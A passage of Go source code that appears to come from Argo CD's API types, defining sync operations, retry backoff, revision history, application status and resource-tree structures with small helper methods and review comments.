	Jsonnet ApplicationSourceJsonnet `json:"jsonnet,omitempty" protobuf:"bytes,2,opt,name=jsonnet"`
	// Exclude is a pattern of files to skip — presumably a glob; confirm in the repo-server
	Exclude string `json:"exclude,omitempty" protobuf:"bytes,3,opt,name=exclude"`
	// Include is a pattern of files to process — presumably a glob; confirm in the repo-server
	Include string `json:"include,omitempty" protobuf:"bytes,4,opt,name=include"`
}

// IsZero reports whether the directory options are nil or entirely default.
// NOTE(review): Exclude and Include are not considered here — confirm intended.
func (d *ApplicationSourceDirectory) IsZero() bool {
	if d == nil {
		return true
	}
	return !d.Recurse && d.Jsonnet.IsZero()
}
// ApplicationSourcePlugin holds config management plugin specific options
type ApplicationSourcePlugin struct {
	Name string `json:"name,omitempty" protobuf:"bytes,1,opt,name=name"`
	Env  `json:"env,omitempty" protobuf:"bytes,2,opt,name=env"`
}

// IsZero reports whether the plugin reference is nil or entirely unset.
func (c *ApplicationSourcePlugin) IsZero() bool {
	if c == nil {
		return true
	}
	return c.Name == "" && c.Env.IsZero()
}

// AddEnvEntry upserts e into the plugin environment: an existing entry with
// the same name is replaced, otherwise e is appended.
func (c *ApplicationSourcePlugin) AddEnvEntry(e *EnvEntry) {
	for i := range c.Env {
		if c.Env[i].Name == e.Name {
			c.Env[i] = e
			return
		}
	}
	c.Env = append(c.Env, e)
}
// ApplicationDestination contains deployment destination information
type ApplicationDestination struct {
	// Server overrides the environment server value in the ksonnet app.yaml
	Server string `json:"server,omitempty" protobuf:"bytes,1,opt,name=server"`
	// Namespace overrides the environment namespace value in the ksonnet app.yaml
	Namespace string `json:"namespace,omitempty" protobuf:"bytes,2,opt,name=namespace"`
	// Name of the destination cluster which can be used instead of server (url) field
	Name string `json:"name,omitempty" protobuf:"bytes,3,opt,name=name"`
	// isServerInferred is internal-only state (excluded from JSON); presumably
	// marks that Server was resolved from Name rather than set explicitly —
	// confirm against the code that populates it.
	// nolint:govet
	isServerInferred bool `json:"-"`
}
// ApplicationStatus contains information about application sync, health status
type ApplicationStatus struct {
	// Resources is the per-resource status of the application's objects
	Resources []ResourceStatus `json:"resources,omitempty" protobuf:"bytes,1,opt,name=resources"`
	// Sync is the overall comparison (sync) status against the target revision
	Sync SyncStatus `json:"sync,omitempty" protobuf:"bytes,2,opt,name=sync"`
	// Health is the aggregated application health
	Health HealthStatus `json:"health,omitempty" protobuf:"bytes,3,opt,name=health"`
	// History records past deployments (oldest first, per RevisionHistories)
	History RevisionHistories `json:"history,omitempty" protobuf:"bytes,4,opt,name=history"`
	// Conditions lists warning/error conditions currently observed for the app
	Conditions []ApplicationCondition `json:"conditions,omitempty" protobuf:"bytes,5,opt,name=conditions"`
	// ReconciledAt indicates when the application state was reconciled using the latest git version
	ReconciledAt *metav1.Time `json:"reconciledAt,omitempty" protobuf:"bytes,6,opt,name=reconciledAt"`
	// OperationState holds the state of the currently running (or most recent) operation
	OperationState *OperationState `json:"operationState,omitempty" protobuf:"bytes,7,opt,name=operationState"`
	// ObservedAt indicates when the application state was updated without querying latest git state
	// Deprecated: controller no longer updates ObservedAt field
	ObservedAt *metav1.Time `json:"observedAt,omitempty" protobuf:"bytes,8,opt,name=observedAt"`
	// SourceType is the detected config management tool of the source
	SourceType ApplicationSourceType `json:"sourceType,omitempty" protobuf:"bytes,9,opt,name=sourceType"`
	// Summary holds aggregated application information (see ApplicationSummary)
	Summary ApplicationSummary `json:"summary,omitempty" protobuf:"bytes,10,opt,name=summary"`
}
// JWTTokens holds a list of issued JWT tokens.
type JWTTokens struct {
	Items []JWTToken `json:"items,omitempty" protobuf:"bytes,1,opt,name=items"`
}

// AppProjectStatus contains information about appproj
type AppProjectStatus struct {
	// JWTTokensByRole maps a project role name to the JWT tokens issued for it
	JWTTokensByRole map[string]JWTTokens `json:"jwtTokensByRole,omitempty" protobuf:"bytes,1,opt,name=jwtTokensByRole"`
}

// OperationInitiator holds information about the operation initiator
type OperationInitiator struct {
	// Username is the name of a user who started operation.
	Username string `json:"username,omitempty" protobuf:"bytes,1,opt,name=username"`
	// Automated is set to true if operation was initiated automatically by the application controller.
	Automated bool `json:"automated,omitempty" protobuf:"bytes,2,opt,name=automated"`
}
// Operation contains requested operation parameters.
type Operation struct {
	// Sync contains sync operation details; nil when no sync was requested
	Sync *SyncOperation `json:"sync,omitempty" protobuf:"bytes,1,opt,name=sync"`
	// InitiatedBy records who or what started the operation
	InitiatedBy OperationInitiator `json:"initiatedBy,omitempty" protobuf:"bytes,2,opt,name=initiatedBy"`
	// Info is a list of informational name/value pairs attached to the operation
	Info []*Info `json:"info,omitempty" protobuf:"bytes,3,name=info"`
	// Retry controls failed sync retry behavior
	Retry RetryStrategy `json:"retry,omitempty" protobuf:"bytes,4,opt,name=retry"`
}
// DryRun reports whether the operation is a sync requested in dry-run mode.
// Non-sync operations are never dry runs.
func (o *Operation) DryRun() bool {
	if o.Sync == nil {
		return false
	}
	return o.Sync.DryRun
}
// SyncOperationResource contains resources to sync.
type SyncOperationResource struct {
	// Group is the resource API group; empty for the core group
	Group string `json:"group,omitempty" protobuf:"bytes,1,opt,name=group"`
	// Kind is the resource kind (required)
	Kind string `json:"kind" protobuf:"bytes,2,opt,name=kind"`
	// Name is the resource name (required)
	Name string `json:"name" protobuf:"bytes,3,opt,name=name"`
	// Namespace of the resource; when empty it matches any namespace (see HasIdentity)
	Namespace string `json:"namespace,omitempty" protobuf:"bytes,4,opt,name=namespace"`
}
// RevisionHistories is an array of history, oldest first and newest last.
type RevisionHistories []RevisionHistory

// LastRevisionHistory returns the most recent deployment record.
// NOTE(review): panics on an empty list — callers must check length first.
func (in RevisionHistories) LastRevisionHistory() RevisionHistory {
	return in[len(in)-1]
}

// Trunc drops the oldest entries so that at most n remain.
func (in RevisionHistories) Trunc(n int) RevisionHistories {
	if excess := len(in) - n; excess > 0 {
		return in[excess:]
	}
	return in
}
// HasIdentity determines whether a sync operation is identified by a manifest
// with the given name, namespace and GroupVersionKind. An empty Namespace on
// the filter matches any namespace.
// NOTE(review): gvk.Version is not compared — confirm that is intended.
func (r SyncOperationResource) HasIdentity(name string, namespace string, gvk schema.GroupVersionKind) bool {
	return name == r.Name &&
		gvk.Kind == r.Kind &&
		gvk.Group == r.Group &&
		(r.Namespace == "" || namespace == r.Namespace)
}
// SyncOperation contains sync operation details.
type SyncOperation struct {
	// Revision is the revision in which to sync the application to.
	// If omitted, will use the revision specified in app spec.
	Revision string `json:"revision,omitempty" protobuf:"bytes,1,opt,name=revision"`
	// Prune deletes resources that are no longer tracked in git
	Prune bool `json:"prune,omitempty" protobuf:"bytes,2,opt,name=prune"`
	// DryRun will perform a `kubectl apply --dry-run` without actually performing the sync
	DryRun bool `json:"dryRun,omitempty" protobuf:"bytes,3,opt,name=dryRun"`
	// SyncStrategy describes how to perform the sync
	SyncStrategy *SyncStrategy `json:"syncStrategy,omitempty" protobuf:"bytes,4,opt,name=syncStrategy"`
	// Resources describes which resources to sync
	// NOTE(review): protobuf field 5 is skipped — presumably a removed field
	// reserved for wire compatibility; confirm before reuse.
	Resources []SyncOperationResource `json:"resources,omitempty" protobuf:"bytes,6,opt,name=resources"`
	// Source overrides the source definition set in the application.
	// This is typically set in a Rollback operation and nil during a Sync operation
	Source *ApplicationSource `json:"source,omitempty" protobuf:"bytes,7,opt,name=source"`
	// Manifests is an optional field that overrides sync source with a local directory for development
	Manifests []string `json:"manifests,omitempty" protobuf:"bytes,8,opt,name=manifests"`
	// SyncOptions provide per-sync sync-options, e.g. Validate=false
	SyncOptions SyncOptions `json:"syncOptions,omitempty" protobuf:"bytes,9,opt,name=syncOptions"`
}
// IsApplyStrategy reports whether the sync is configured to use the
// `kubectl apply` strategy.
func (o *SyncOperation) IsApplyStrategy() bool {
	if o.SyncStrategy == nil {
		return false
	}
	return o.SyncStrategy.Apply != nil
}
// OperationState contains information about state of currently performing operation on application.
type OperationState struct {
	// Operation is the original requested operation
	Operation Operation `json:"operation" protobuf:"bytes,1,opt,name=operation"`
	// Phase is the current phase of the operation
	Phase synccommon.OperationPhase `json:"phase" protobuf:"bytes,2,opt,name=phase"`
	// Message hold any pertinent messages when attempting to perform operation (typically errors).
	Message string `json:"message,omitempty" protobuf:"bytes,3,opt,name=message"`
	// SyncResult is the result of a Sync operation
	SyncResult *SyncOperationResult `json:"syncResult,omitempty" protobuf:"bytes,4,opt,name=syncResult"`
	// StartedAt contains time of operation start
	// NOTE(review): protobuf field 5 is skipped — presumably a removed field
	// reserved for wire compatibility; confirm before reuse.
	StartedAt metav1.Time `json:"startedAt" protobuf:"bytes,6,opt,name=startedAt"`
	// FinishedAt contains time of operation completion
	FinishedAt *metav1.Time `json:"finishedAt,omitempty" protobuf:"bytes,7,opt,name=finishedAt"`
	// RetryCount contains time of operation retries
	RetryCount int64 `json:"retryCount,omitempty" protobuf:"bytes,8,opt,name=retryCount"`
}
// Info is a human-readable name/value pair attached to applications and operations.
type Info struct {
	Name  string `json:"name" protobuf:"bytes,1,name=name"`
	Value string `json:"value" protobuf:"bytes,2,name=value"`
}
// SyncOptions is a list of whole-app sync options, e.g. "Validate=false".
type SyncOptions []string

// AddOption returns the options with option appended, unless it is already present.
func (o SyncOptions) AddOption(option string) SyncOptions {
	if o.HasOption(option) {
		return o
	}
	return append(o, option)
}

// RemoveOption returns the options with the first occurrence of option
// removed. Note the removal mutates the shared backing array in place.
func (o SyncOptions) RemoveOption(option string) SyncOptions {
	for i := range o {
		if o[i] == option {
			return append(o[:i], o[i+1:]...)
		}
	}
	return o
}

// HasOption reports whether option is present.
func (o SyncOptions) HasOption(option string) bool {
	for _, existing := range o {
		if existing == option {
			return true
		}
	}
	return false
}
// SyncPolicy controls when a sync will be performed in response to updates in git
type SyncPolicy struct {
	// Automated will keep an application synced to the target revision; nil disables auto-sync
	Automated *SyncPolicyAutomated `json:"automated,omitempty" protobuf:"bytes,1,opt,name=automated"`
	// SyncOptions allow you to specify whole app sync-options
	SyncOptions SyncOptions `json:"syncOptions,omitempty" protobuf:"bytes,2,opt,name=syncOptions"`
	// Retry controls failed sync retry behavior; nil means no retry configuration
	Retry *RetryStrategy `json:"retry,omitempty" protobuf:"bytes,3,opt,name=retry"`
}
// IsZero reports whether the policy is nil or entirely unset.
func (p *SyncPolicy) IsZero() bool {
	if p == nil {
		return true
	}
	return p.Automated == nil && len(p.SyncOptions) == 0 && p.Retry == nil
}
// RetryStrategy controls how failed syncs are retried.
type RetryStrategy struct {
	// Limit is the maximum number of attempts when retrying a container
	Limit int64 `json:"limit,omitempty" protobuf:"bytes,1,opt,name=limit"`
	// Backoff is a backoff strategy; nil means the defaults from the common
	// package are used (see NextRetryAt)
	Backoff *Backoff `json:"backoff,omitempty" protobuf:"bytes,2,opt,name=backoff,casttype=Backoff"`
}
func parseStringToDuration(durationString string) (time.Duration, error) {
var suspendDuration time.Duration
// If no units are attached, treat as seconds
if val, err := strconv.Atoi(durationString); err == nil {
suspendDuration = time.Duration(val) * time.Second
} else if duration, err := time.ParseDuration(durationString); err == nil {
suspendDuration = duration
} else {
return 0, fmt.Errorf("unable to parse %s as a duration", durationString)
}
return suspendDuration, nil
}
// NextRetryAt calculates the earliest time the next retry should run, given
// the time of the last attempt and how many retries have already happened.
// The wait grows exponentially (duration * factor^retryCounts) and is capped
// by the backoff's MaxDuration when one is set. Defaults for duration,
// max duration and factor come from the common package; any of them can be
// overridden via r.Backoff. Returns an error when a backoff duration string
// cannot be parsed.
func (r *RetryStrategy) NextRetryAt(lastAttempt time.Time, retryCounts int64) (time.Time, error) {
	maxDuration := common.DefaultSyncRetryMaxDuration
	duration := common.DefaultSyncRetryDuration
	factor := common.DefaultSyncRetryFactor
	var err error
	if r.Backoff != nil {
		if r.Backoff.Duration != "" {
			if duration, err = parseStringToDuration(r.Backoff.Duration); err != nil {
				return time.Time{}, err
			}
		}
		if r.Backoff.MaxDuration != "" {
			if maxDuration, err = parseStringToDuration(r.Backoff.MaxDuration); err != nil {
				return time.Time{}, err
			}
		}
		if r.Backoff.Factor != nil {
			factor = *r.Backoff.Factor
		}
	}
	// Formula: timeToWait = duration * factor^retry_number
	// Note that timeToWait should equal to duration for the first retry attempt
	// (retryCounts == 0, so the factor term is 1).
	timeToWait := duration * time.Duration(math.Pow(float64(factor), float64(retryCounts)))
	// Cap at maxDuration when one is configured. Comparing durations directly
	// (instead of round-tripping through math.Min/float64) keeps full int64
	// precision for very large durations.
	if maxDuration > 0 && timeToWait > maxDuration {
		timeToWait = maxDuration
	}
	return lastAttempt.Add(timeToWait), nil
}
// Backoff is a backoff strategy to use within retryStrategy
type Backoff struct {
	// Duration is the amount to back off. Default unit is seconds, but could also be a duration (e.g. "2m", "1h")
	Duration string `json:"duration,omitempty" protobuf:"bytes,1,opt,name=duration"`
	// Factor is a factor to multiply the base duration after each failed retry;
	// nil means the package default factor is used (see NextRetryAt)
	Factor *int64 `json:"factor,omitempty" protobuf:"bytes,2,name=factor"`
	// MaxDuration is the maximum amount of time allowed for the backoff strategy;
	// same string format as Duration
	MaxDuration string `json:"maxDuration,omitempty" protobuf:"bytes,3,opt,name=maxDuration"`
}
// SyncPolicyAutomated controls the behavior of an automated sync
type SyncPolicyAutomated struct {
	// Prune will prune resources automatically as part of automated sync (default: false)
	Prune bool `json:"prune,omitempty" protobuf:"bytes,1,opt,name=prune"`
	// SelfHeal enables automatic syncing when the live state deviates from the
	// desired state (default: false) — original comment was truncated; confirm wording
	SelfHeal bool `json:"selfHeal,omitempty" protobuf:"bytes,2,opt,name=selfHeal"`
	// AllowEmpty allows apps have zero live resources (default: false)
	AllowEmpty bool `json:"allowEmpty,omitempty" protobuf:"bytes,3,opt,name=allowEmpty"`
}
// SyncStrategy controls the manner in which a sync is performed
type SyncStrategy struct {
	// Apply will perform a `kubectl apply` to perform the sync.
	Apply *SyncStrategyApply `json:"apply,omitempty" protobuf:"bytes,1,opt,name=apply"`
	// Hook will submit any referenced resources to perform the sync. This is the default strategy
	Hook *SyncStrategyHook `json:"hook,omitempty" protobuf:"bytes,2,opt,name=hook"`
}
// Force reports whether the configured strategy (apply or hook) requests a
// forced apply. A nil strategy, or one with neither variant set, is not forced.
func (m *SyncStrategy) Force() bool {
	switch {
	case m == nil:
		return false
	case m.Apply != nil:
		return m.Apply.Force
	case m.Hook != nil:
		return m.Hook.Force
	default:
		return false
	}
}
// SyncStrategyApply uses `kubectl apply` to perform the apply
type SyncStrategyApply struct {
	// Force indicates whether or not to supply the --force flag to `kubectl apply`.
	// The --force flag deletes and re-create the resource, when PATCH encounters conflict and has
	// retried for 5 times.
	Force bool `json:"force,omitempty" protobuf:"bytes,1,opt,name=force"`
}

// SyncStrategyHook will perform a sync using hooks annotations.
// If no hook annotation is specified falls back to `kubectl apply`.
type SyncStrategyHook struct {
	// Embed SyncStrategyApply type to inherit any `apply` options
	// +optional
	SyncStrategyApply `json:",inline" protobuf:"bytes,1,opt,name=syncStrategyApply"`
}
// RevisionMetadata contains data about a specific revision within a repo.
type RevisionMetadata struct {
	// Author is who authored this revision,
	// typically their name and email, e.g. "John Doe <[email protected]>",
	// but might not match this example
	Author string `json:"author,omitempty" protobuf:"bytes,1,opt,name=author"`
	// Date is when the revision was authored
	Date metav1.Time `json:"date" protobuf:"bytes,2,opt,name=date"`
	// Tags are the tags on the revision,
	// note - tags can move from one revision to another
	Tags []string `json:"tags,omitempty" protobuf:"bytes,3,opt,name=tags"`
	// Message is the message associated with the revision,
	// probably the commit message,
	// this is truncated to the first newline or 64 characters (which ever comes first)
	Message string `json:"message,omitempty" protobuf:"bytes,4,opt,name=message"`
	// SignatureInfo contains a hint on the signer if the revision was signed
	// with GPG and signature verification is enabled
	SignatureInfo string `json:"signatureInfo,omitempty" protobuf:"bytes,5,opt,name=signatureInfo"`
}
// SyncOperationResult represents the result of a sync operation.
type SyncOperationResult struct {
	// Resources holds the sync result of each individual resource
	Resources ResourceResults `json:"resources,omitempty" protobuf:"bytes,1,opt,name=resources"`
	// Revision holds the revision of the sync
	Revision string `json:"revision" protobuf:"bytes,2,opt,name=revision"`
	// Source records the application source information of the sync, used for comparing auto-sync
	Source ApplicationSource `json:"source,omitempty" protobuf:"bytes,3,opt,name=source"`
}
// ResourceResult holds the operation result details of a specific resource
type ResourceResult struct {
	// Group is the resource API group; empty for the core group
	Group string `json:"group" protobuf:"bytes,1,opt,name=group"`
	// Version is the resource API version
	Version string `json:"version" protobuf:"bytes,2,opt,name=version"`
	// Kind is the resource kind
	Kind string `json:"kind" protobuf:"bytes,3,opt,name=kind"`
	// Namespace is the resource namespace
	Namespace string `json:"namespace" protobuf:"bytes,4,opt,name=namespace"`
	// Name is the resource name
	Name string `json:"name" protobuf:"bytes,5,opt,name=name"`
	// Status is the final result of the sync; this is empty if the resource is yet to be applied/pruned and is always zero-value for hooks
	Status synccommon.ResultCode `json:"status,omitempty" protobuf:"bytes,6,opt,name=status"`
	// Message is the message for the last sync OR operation
	Message string `json:"message,omitempty" protobuf:"bytes,7,opt,name=message"`
	// HookType is the type of the hook, empty for non-hook resources
	HookType synccommon.HookType `json:"hookType,omitempty" protobuf:"bytes,8,opt,name=hookType"`
	// HookPhase is the state of any operation associated with this resource OR hook
	// note: can contain values for non-hook resources
	HookPhase synccommon.OperationPhase `json:"hookPhase,omitempty" protobuf:"bytes,9,opt,name=hookPhase"`
	// SyncPhase indicates the particular phase of the sync that this is for
	SyncPhase synccommon.SyncPhase `json:"syncPhase,omitempty" protobuf:"bytes,10,opt,name=syncPhase"`
}
// GroupVersionKind returns the GVK identifying the resource this result is for.
func (r *ResourceResult) GroupVersionKind() schema.GroupVersionKind {
	return schema.GroupVersionKind{Group: r.Group, Version: r.Version, Kind: r.Kind}
}
// ResourceResults is a list of per-resource sync results.
type ResourceResults []*ResourceResult

// Find returns the index and entry matching the given identity and sync phase.
// On a miss it returns (0, nil) — callers must check the pointer, not the
// index, to detect "not found".
func (r ResourceResults) Find(group string, kind string, namespace string, name string, phase synccommon.SyncPhase) (int, *ResourceResult) {
	for i, res := range r {
		if res.Group != group || res.Kind != kind || res.Namespace != namespace || res.Name != name || res.SyncPhase != phase {
			continue
		}
		return i, res
	}
	return 0, nil
}

// PruningRequired counts resources whose prune was skipped and is therefore
// still outstanding.
func (r ResourceResults) PruningRequired() (num int) {
	for _, res := range r {
		if res.Status == synccommon.ResultCodePruneSkipped {
			num++
		}
	}
	return num
}
// RevisionHistory contains information relevant to an application deployment
type RevisionHistory struct {
	// Revision holds the revision of the sync
	// NOTE(review): protobuf fields 1 and 3 are skipped — presumably removed
	// legacy fields reserved for wire compatibility; confirm before reuse.
	Revision string `json:"revision" protobuf:"bytes,2,opt,name=revision"`
	// DeployedAt holds the time the deployment completed
	DeployedAt metav1.Time `json:"deployedAt" protobuf:"bytes,4,opt,name=deployedAt"`
	// ID is an auto incrementing identifier of the RevisionHistory
	ID int64 `json:"id" protobuf:"bytes,5,opt,name=id"`
	// Source is the application source that was deployed
	Source ApplicationSource `json:"source,omitempty" protobuf:"bytes,6,opt,name=source"`
	// DeployStartedAt holds the time the deployment started
	DeployStartedAt *metav1.Time `json:"deployStartedAt,omitempty" protobuf:"bytes,7,opt,name=deployStartedAt"`
}
// ApplicationWatchEvent contains information about application change.
type ApplicationWatchEvent struct {
	// Type describes the kind of change (Added, Modified, Deleted, Error).
	Type watch.EventType `json:"type" protobuf:"bytes,1,opt,name=type,casttype=k8s.io/apimachinery/pkg/watch.EventType"`
	// Application is:
	// * If Type is Added or Modified: the new state of the object.
	// * If Type is Deleted: the state of the object immediately before deletion.
	// * If Type is Error: *api.Status is recommended; other types may make sense
	// depending on context.
	Application Application `json:"application" protobuf:"bytes,2,opt,name=application"`
}

// ApplicationList is list of Application resources
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
type ApplicationList struct {
	metav1.TypeMeta `json:",inline"`
	metav1.ListMeta `json:"metadata" protobuf:"bytes,1,opt,name=metadata"`
	// Items is the list of applications
	Items []Application `json:"items" protobuf:"bytes,2,rep,name=items"`
}
// ComponentParameter contains information about component parameter value
type ComponentParameter struct {
	// Component the parameter belongs to; optional
	Component string `json:"component,omitempty" protobuf:"bytes,1,opt,name=component"`
	// Name of the parameter (required)
	Name string `json:"name" protobuf:"bytes,2,opt,name=name"`
	// Value of the parameter (required)
	Value string `json:"value" protobuf:"bytes,3,opt,name=value"`
}

// SyncStatusCode is a type which represents possible comparison results
type SyncStatusCode string

// Possible comparison results
const (
	// SyncStatusCodeUnknown means the comparison could not be performed
	SyncStatusCodeUnknown SyncStatusCode = "Unknown"
	// SyncStatusCodeSynced means the live state matches the target state
	SyncStatusCodeSynced SyncStatusCode = "Synced"
	// SyncStatusCodeOutOfSync means the live state deviates from the target state
	SyncStatusCodeOutOfSync SyncStatusCode = "OutOfSync"
)
// ApplicationConditionType represents type of application condition. Type name has following convention:
// prefix "Error" means error condition
// prefix "Warning" means warning condition
// prefix "Info" means informational condition
type ApplicationConditionType = string

const (
	// ApplicationConditionDeletionError indicates that controller failed to delete application
	ApplicationConditionDeletionError = "DeletionError"
	// ApplicationConditionInvalidSpecError indicates that application source is invalid
	ApplicationConditionInvalidSpecError = "InvalidSpecError"
	// ApplicationConditionComparisonError indicates controller failed to compare application state
	ApplicationConditionComparisonError = "ComparisonError"
	// ApplicationConditionSyncError indicates controller failed to automatically sync the application
	ApplicationConditionSyncError = "SyncError"
	// ApplicationConditionUnknownError indicates an unknown controller error
	ApplicationConditionUnknownError = "UnknownError"
	// ApplicationConditionSharedResourceWarning indicates that controller detected resources which belongs to more than one application
	ApplicationConditionSharedResourceWarning = "SharedResourceWarning"
	// ApplicationConditionRepeatedResourceWarning indicates that application source has resource with same Group, Kind, Name, Namespace multiple times
	ApplicationConditionRepeatedResourceWarning = "RepeatedResourceWarning"
	// ApplicationConditionExcludedResourceWarning indicates that application has resource which is configured to be excluded
	ApplicationConditionExcludedResourceWarning = "ExcludedResourceWarning"
	// ApplicationConditionOrphanedResourceWarning indicates that application has orphaned resources
	ApplicationConditionOrphanedResourceWarning = "OrphanedResourceWarning"
)
// ApplicationCondition contains details about current application condition
type ApplicationCondition struct {
	// Type is an application condition type
	Type ApplicationConditionType `json:"type" protobuf:"bytes,1,opt,name=type"`
	// Message contains human-readable message indicating details about condition
	Message string `json:"message" protobuf:"bytes,2,opt,name=message"`
	// LastTransitionTime is the time the condition was first observed.
	LastTransitionTime *metav1.Time `json:"lastTransitionTime,omitempty" protobuf:"bytes,3,opt,name=lastTransitionTime"`
}

// ComparedTo contains application source and target which was used for resources comparison
type ComparedTo struct {
	// Source is the application source compared against the live state
	Source ApplicationSource `json:"source" protobuf:"bytes,1,opt,name=source"`
	// Destination is the application destination used for the comparison
	Destination ApplicationDestination `json:"destination" protobuf:"bytes,2,opt,name=destination"`
}

// SyncStatus is a comparison result of application spec and deployed application.
type SyncStatus struct {
	// Status is the comparison result code
	Status SyncStatusCode `json:"status" protobuf:"bytes,1,opt,name=status,casttype=SyncStatusCode"`
	// ComparedTo records the source/destination pair used for the comparison
	ComparedTo ComparedTo `json:"comparedTo,omitempty" protobuf:"bytes,2,opt,name=comparedTo"`
	// Revision is the revision the comparison was performed against
	Revision string `json:"revision,omitempty" protobuf:"bytes,3,opt,name=revision"`
}

// HealthStatus contains the aggregated health of an application or resource.
type HealthStatus struct {
	// Status is the health status code
	Status health.HealthStatusCode `json:"status,omitempty" protobuf:"bytes,1,opt,name=status"`
	// Message is a human-readable explanation of the health status
	Message string `json:"message,omitempty" protobuf:"bytes,2,opt,name=message"`
}
// InfoItem contains human readable information about object
type InfoItem struct {
	// Name is a human readable title for this piece of information.
	Name string `json:"name,omitempty" protobuf:"bytes,1,opt,name=name"`
	// Value is human readable content.
	Value string `json:"value,omitempty" protobuf:"bytes,2,opt,name=value"`
}

// ResourceNetworkingInfo holds networking resource related information
type ResourceNetworkingInfo struct {
	// TargetLabels are label selectors this resource targets (e.g. a Service's selector).
	TargetLabels map[string]string `json:"targetLabels,omitempty" protobuf:"bytes,1,opt,name=targetLabels"`
	// TargetRefs reference the resources this resource routes traffic to.
	TargetRefs []ResourceRef `json:"targetRefs,omitempty" protobuf:"bytes,2,opt,name=targetRefs"`
	// Labels are the labels set on the resource itself.
	Labels map[string]string `json:"labels,omitempty" protobuf:"bytes,3,opt,name=labels"`
	// Ingress holds load balancer ingress points assigned to the resource.
	Ingress []v1.LoadBalancerIngress `json:"ingress,omitempty" protobuf:"bytes,4,opt,name=ingress"`
	// ExternalURLs holds list of URLs which should be available externally. List is populated for ingress resources using rules hostnames.
	ExternalURLs []string `json:"externalURLs,omitempty" protobuf:"bytes,5,opt,name=externalURLs"`
}
// HostResourceInfo holds metrics for a single resource type (e.g. cpu, memory)
// on one Kubernetes node.
type HostResourceInfo struct {
	// ResourceName identifies the resource (cpu, memory, ...).
	ResourceName v1.ResourceName `json:"resourceName,omitempty" protobuf:"bytes,1,name=resourceName"`
	// RequestedByApp is the amount requested by pods of this application.
	RequestedByApp int64 `json:"requestedByApp,omitempty" protobuf:"bytes,2,name=requestedByApp"`
	// RequestedByNeighbors is the amount requested by other pods on the same node.
	RequestedByNeighbors int64 `json:"requestedByNeighbors,omitempty" protobuf:"bytes,3,name=requestedByNeighbors"`
	// Capacity is the node's total capacity for this resource.
	Capacity int64 `json:"capacity,omitempty" protobuf:"bytes,4,name=capacity"`
}

// HostInfo holds host name and resources metrics
type HostInfo struct {
	Name          string             `json:"name,omitempty" protobuf:"bytes,1,name=name"`
	ResourcesInfo []HostResourceInfo `json:"resourcesInfo,omitempty" protobuf:"bytes,2,name=resourcesInfo"`
	SystemInfo    v1.NodeSystemInfo  `json:"systemInfo,omitempty" protobuf:"bytes,3,opt,name=systemInfo"`
}
// ApplicationTree holds nodes which belongs to the application
type ApplicationTree struct {
	// Nodes contains list of nodes which either directly managed by the application and children of directly managed nodes.
	Nodes []ResourceNode `json:"nodes,omitempty" protobuf:"bytes,1,rep,name=nodes"`
	// OrphanedNodes contains if or orphaned nodes: nodes which are not managed by the app but in the same namespace. List is populated only if orphaned resources enabled in app project.
	OrphanedNodes []ResourceNode `json:"orphanedNodes,omitempty" protobuf:"bytes,2,rep,name=orphanedNodes"`
	// Hosts holds list of Kubernetes nodes that run application related pods
	Hosts []HostInfo `json:"hosts,omitempty" protobuf:"bytes,3,rep,name=hosts"`
}
// Normalize sorts application tree nodes and hosts into a deterministic order.
// The persistent ordering lets a previously cached app tree be compared cheaply
// and avoids unnecessary Redis requests.
func (t *ApplicationTree) Normalize() {
	// Both node slices are ordered by the same key, so share one comparator factory.
	byFullName := func(nodes []ResourceNode) func(int, int) bool {
		return func(a, b int) bool {
			return nodes[a].FullName() < nodes[b].FullName()
		}
	}
	sort.Slice(t.Hosts, func(a, b int) bool {
		return t.Hosts[a].Name < t.Hosts[b].Name
	})
	sort.Slice(t.Nodes, byFullName(t.Nodes))
	sort.Slice(t.OrphanedNodes, byFullName(t.OrphanedNodes))
}
// ApplicationSummary aggregates noteworthy facts collected from an
// application's child resources.
type ApplicationSummary struct {
	// ExternalURLs holds all external URLs of application child resources.
	ExternalURLs []string `json:"externalURLs,omitempty" protobuf:"bytes,1,opt,name=externalURLs"`
	// Images holds all images of application child resources.
	Images []string `json:"images,omitempty" protobuf:"bytes,2,opt,name=images"`
}
// FindNode returns the first managed or orphaned node matching the given
// group, kind, namespace and name, or nil when no such node exists.
//
// The returned pointer refers to a copy of the matched node (same as the
// previous implementation), so mutating it does not alter the tree.
func (t *ApplicationTree) FindNode(group string, kind string, namespace string, name string) *ResourceNode {
	// Iterate the two slices separately rather than `append(t.Nodes, t.OrphanedNodes...)`:
	// if t.Nodes has spare capacity, that append writes OrphanedNodes into its
	// backing array, silently corrupting any other slice that shares it.
	for _, nodes := range [][]ResourceNode{t.Nodes, t.OrphanedNodes} {
		for i := range nodes {
			n := nodes[i]
			if n.Group == group && n.Kind == kind && n.Namespace == namespace && n.Name == name {
				return &n
			}
		}
	}
	return nil
}
// GetSummary collects the distinct external URLs and container images from all
// managed nodes and returns them sorted lexicographically.
func (t *ApplicationTree) GetSummary() ApplicationSummary {
	urlSet := map[string]bool{}
	imageSet := map[string]bool{}
	for i := range t.Nodes {
		if info := t.Nodes[i].NetworkingInfo; info != nil {
			for _, u := range info.ExternalURLs {
				urlSet[u] = true
			}
		}
		for _, img := range t.Nodes[i].Images {
			imageSet[img] = true
		}
	}
	// sortedKeys flattens a set into a sorted, non-nil slice.
	sortedKeys := func(set map[string]bool) []string {
		out := make([]string, 0, len(set))
		for k := range set {
			out = append(out, k)
		}
		sort.Strings(out)
		return out
	}
	return ApplicationSummary{ExternalURLs: sortedKeys(urlSet), Images: sortedKeys(imageSet)}
}
// ResourceRef includes fields which unique identify resource
type ResourceRef struct {
	Group     string `json:"group,omitempty" protobuf:"bytes,1,opt,name=group"`
	Version   string `json:"version,omitempty" protobuf:"bytes,2,opt,name=version"`
	Kind      string `json:"kind,omitempty" protobuf:"bytes,3,opt,name=kind"`
	Namespace string `json:"namespace,omitempty" protobuf:"bytes,4,opt,name=namespace"`
	Name      string `json:"name,omitempty" protobuf:"bytes,5,opt,name=name"`
	UID       string `json:"uid,omitempty" protobuf:"bytes,6,opt,name=uid"`
}

// ResourceNode contains information about live resource and its children
type ResourceNode struct {
	// ResourceRef identifies the live resource this node describes.
	ResourceRef `json:",inline" protobuf:"bytes,1,opt,name=resourceRef"`
	// ParentRefs identify the direct parents of this resource in the tree.
	ParentRefs []ResourceRef `json:"parentRefs,omitempty" protobuf:"bytes,2,opt,name=parentRefs"`
	// Info holds human readable details about the resource.
	Info []InfoItem `json:"info,omitempty" protobuf:"bytes,3,opt,name=info"`
